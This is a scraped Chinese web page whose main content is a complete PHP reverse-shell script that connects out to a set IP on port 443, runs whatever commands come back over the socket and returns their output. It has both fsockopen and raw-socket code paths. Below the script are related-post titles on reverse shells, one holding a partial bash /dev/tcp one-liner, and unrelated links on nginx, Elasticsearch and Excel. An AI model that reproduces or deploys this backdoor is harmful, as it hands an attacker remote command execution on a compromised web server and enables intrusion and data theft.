<?php 

error_reporting (E_ERROR);

ignore_user_abort(true);

ini_set('max_execution_time',0);

$os = substr(PHP_OS,0,3);

$ipaddr = 'x.x.x.x';

$port = '443';

$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));

$cwd = getcwd();

$msg = php_uname()."\n------------Code by Spider-------------\n";

if($os == 'WIN') {

    $env = array('path' => 'c:\\windows\\system32');

} else {

    $env = array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');

}

if(function_exists('fsockopen')) {

    $sock = fsockopen($ipaddr,$port);

    fwrite($sock,$msg);

    while ($cmd = fread($sock,1024)) {

        if (substr($cmd,0,3) == 'cd ') {

            $cwd = trim(substr($cmd,3,-1));

            chdir($cwd);

            $cwd = getcwd();

        }

        if (trim(strtolower($cmd)) == 'exit') {

            break;

        } else {

            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);

            if (is_resource($process)) {

                fwrite($pipes[0],$cmd);

                fclose($pipes[0]);

                $msg = stream_get_contents($pipes[1]);

                fwrite($sock,$msg);

                fclose($pipes[1]);

                $msg = stream_get_contents($pipes[2]);

                fwrite($sock,$msg);

                fclose($pipes[2]);

                proc_close($process);

            }

        }

    }

    fclose($sock);

} else {

    $sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);

    socket_connect($sock,$ipaddr,$port);

    socket_write($sock,$msg);

    fwrite($sock,$msg);

    while ($cmd = socket_read($sock,1024)) {

        if (substr($cmd,0,3) == 'cd ') {

            $cwd = trim(substr($cmd,3,-1));

            chdir($cwd);

            $cwd = getcwd();

        }

        if (trim(strtolower($cmd)) == 'exit') {

            break;

        } else {

            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);

            if (is_resource($process)) {

                fwrite($pipes[0],$cmd);

                fclose($pipes[0]);

                $msg = stream_get_contents($pipes[1]);

                socket_write($sock,$msg,strlen($msg));

                fclose($pipes[1]);

                $msg = stream_get_contents($pipes[2]);

                socket_write($sock,$msg,strlen($msg));

                fclose($pipes[2]);

                proc_close($process);

            }

        }

    }

    socket_close($sock);

}

?>

fsockopen反弹shell脚本的更多相关文章

  1. 如何DIY一个简单的反弹Shell脚本

    00起因 之前在一个服务器上做测试的时候需要从本地连到服务器上,但是服务器没有开ssh服务,但是有python环境,想着自己写一个脚本可以从自己本地连接到服务器,然后服务器端可以将处理完的请求结果返回 ...

  2. 常用的反弹shell脚本

    bash shell反弹脚本 /bin/bash -i > /dev/tcp/10.211.55.11/ <& >& Python shell 反弹脚本 #!/usr ...

  3. Zabbix sql注入漏洞脚本执行反弹shell

    exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+------------------------------------ ...

  4. Linux下反弹shell的种种方式

    [前言:在乌云社区看到反弹shell的几种姿势,看过之余自己还收集了一些,动手试了下,仅供参考] 0x01 Bash bash -i >& /dev/tcp/ >& 这里s ...

  5. 从一次渗透谈到linux如何反弹shell

    零.绪论 背景: ThinkPHP框架的--> 找到一个OS命令注入(很简单的Burp可以直接扫出来的那种):页面配置系统默认网关处. 一.渗透过程 1.首先看了一下,没有回显. 2.用ceye ...

  6. linux反弹shell

    参考链接 http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html http://www.waitalone.cn/linux-s ...

  7. linux下反弹shell

    01 前言 CTF中一些命令执行的题目需要反弹shell,于是solo一波. 02 环境 win10      192.168.43.151       监听端    装有nc kali        ...

  8. Linux 反弹 Shell

    攻击场景 Attacker:192.168.0.106 win10 Victim:192.168.2.140 kali NC 反弹 shell Netcat简介 俗称瑞士军刀或NC,小巧强悍,可以读写 ...

  9. 【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。

    反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹.假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规 ...

随机推荐

  1. linux系统centos7安装最新版本nginx

    一.准备环境 1.安装centos,一般买一个阿里云测试 2.下载nginx,链接http://nginx.org/download/nginx-1.10.2.tar.gz 二.开始安装 1.cent ...

  2. python批量插入数据到es和读取es数据

    一.插入数据 1.首先准备类似如下数据 {"_type": "type1", "_id": 1, "_index": & ...

  3. 解决方案:从网站下载Excel,我的Office 2016,打开excel文件,显示空白

    今天在写Excel导出案例demo的时候发现,Excel下载后打开空白,要打开了看到空白后再点击一次打开后才可以显示,效果就如下图所示: 那么我就不能一次打开吗?我找了半天最终在这个博客找到了答案:h ...

  4. jquery 常用选择器基础语法学习

    siblings方法的常用应用场景:选中高亮 实现代码 <!DOCTYPE html> <html> <head> <meta charset="U ...

  5. springcloud~配置中心~对敏感信息加密

    简介 RSA非对称加密有着非常强大的安全性,HTTPS的SSL加密就是使用这种方法进行HTTPS请求加密传输的.因为RSA算法会涉及Private Key和Public Key分别用来加密和解密,所以 ...

  6. JDK性能分析与故障处理-命令行

    一.命令演示登录主机:21docker ps -a | grep 'hub.ecs.com:6999/open_pro.*open-pro-apple2'docker exec -it ID /bin ...

  7. ES 6新语法

    一.块级作用域绑定 回顾:使用var关键字定义变量 定义 = 声明 + 赋值:   1. 可以一次定义多个变量 2. 定义时可以只声明不赋值 3. 定义之后可以随时修改变量的值 4. 变量声明会被提升 ...

  8. 获取zabbix上所有主机的IP和主机名

    #coding:utf-8 #获取zabbix上所有主机的IP和主机名 import requests import json import csv import time def get_token ...

  9. IS:Introduction Parrot

    Ax_What is Linux? "Linux is a family of free and open-source software operating systems based o ...

  10. 团队开发的代码管理(VS)

    1.文档 代码需要一个文档说明代码的基本情况,使用的组件,代码逻辑层等等 2.源代码冲突(Git) 首先需要尽可能避免冲突,公共的工具基类尽可能不动,如果需要修改也交给专人修改不能谁都上去修改 项目按 ...